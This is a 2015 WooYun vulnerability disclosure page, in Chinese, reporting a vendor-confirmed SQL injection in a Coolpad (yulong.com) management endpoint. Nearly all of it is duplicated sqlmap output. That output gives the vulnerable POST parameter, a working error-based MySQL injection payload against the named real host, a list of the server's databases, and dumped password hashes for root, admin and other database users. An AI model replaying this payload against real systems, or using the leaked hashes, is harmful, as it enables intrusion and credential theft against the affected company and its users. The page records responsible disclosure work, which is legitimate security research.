当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090915

漏洞标题:酷派某系统高危SQL注入

相关厂商:yulong.com

漏洞作者: if、so

提交时间:2015-01-09 21:30

修复时间:2015-02-23 21:32

公开时间:2015-02-23 21:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-12: 厂商已经确认,细节仅向厂商公开
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-23: 细节向公众公开

简要描述:

酷派某处高危注入,root权限

详细说明:

http://manage.coolyun.com/report/appreport (POST)
endDate=2015-01-08&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
参数enddate

sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
available databases [12]:
[*] coolmsg
[*] db_yl_coolshow_charge_data
[*] db_yl_coolshow_charge_data_20141118
[*] db_yl_coolshow_charge_data_20150106
[*] db_yl_coolshow_charge_data_20150109
[*] db_yl_coolshow_charge_records
[*] db_yl_health
[*] db_yl_weather
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


database management system users password hashes:
[*] admin [1]:
    password hash: *A45ED16ACB66C7B8E6365D53A5718C7770A10DDA
[*] coolcloud [1]:
    password hash: *681EAB6E64F2549A082F9DAAAA6D05D9171F4802
[*] coolmsg [1]:
    password hash: *BECF2A4520E3ABA9A5C7B549D3E22CCDE99BC83D
[*] coolshow [1]:
    password hash: *2BA75530738A4A2371FF1F606CE13484CDA4CE14
[*] health [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094
[*] root [1]:
    password hash: *F66B0A1403B214CC3AC0CAACF3C0D8464E4E397A
[*] weather [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094

漏洞证明:

sqlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: endDate
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: endDate=2015-01-08' AND (SELECT 2903 FROM(SELECT COUNT(*),CONCAT(0x3a6b64763a,(SELECT (CASE WHEN (2903=2903) THEN 1 ELSE 0 END)),0x3a69756c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JvPz'='JvPz&ktype=&payTranslog.count=&payTranslog.failcause=&currentPage=&startDate=2015-01-08
---
web application technology: PHP 5.4.13
back-end DBMS: MySQL 5.0
available databases [12]:
[*] coolmsg
[*] db_yl_coolshow_charge_data
[*] db_yl_coolshow_charge_data_20141118
[*] db_yl_coolshow_charge_data_20150106
[*] db_yl_coolshow_charge_data_20150109
[*] db_yl_coolshow_charge_records
[*] db_yl_health
[*] db_yl_weather
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


database management system users password hashes:
[*] admin [1]:
    password hash: *A45ED16ACB66C7B8E6365D53A5718C7770A10DDA
[*] coolcloud [1]:
    password hash: *681EAB6E64F2549A082F9DAAAA6D05D9171F4802
[*] coolmsg [1]:
    password hash: *BECF2A4520E3ABA9A5C7B549D3E22CCDE99BC83D
[*] coolshow [1]:
    password hash: *2BA75530738A4A2371FF1F606CE13484CDA4CE14
[*] health [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094
[*] root [1]:
    password hash: *F66B0A1403B214CC3AC0CAACF3C0D8464E4E397A
[*] weather [1]:
    password hash: *96E1E8EE2F15CD75D11757F0B0AFB48DC7B7D094

修复方案:

。。

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-12 15:44

厂商回复:

感谢提供,已提交给业务部门紧急处理。

最新状态:

暂无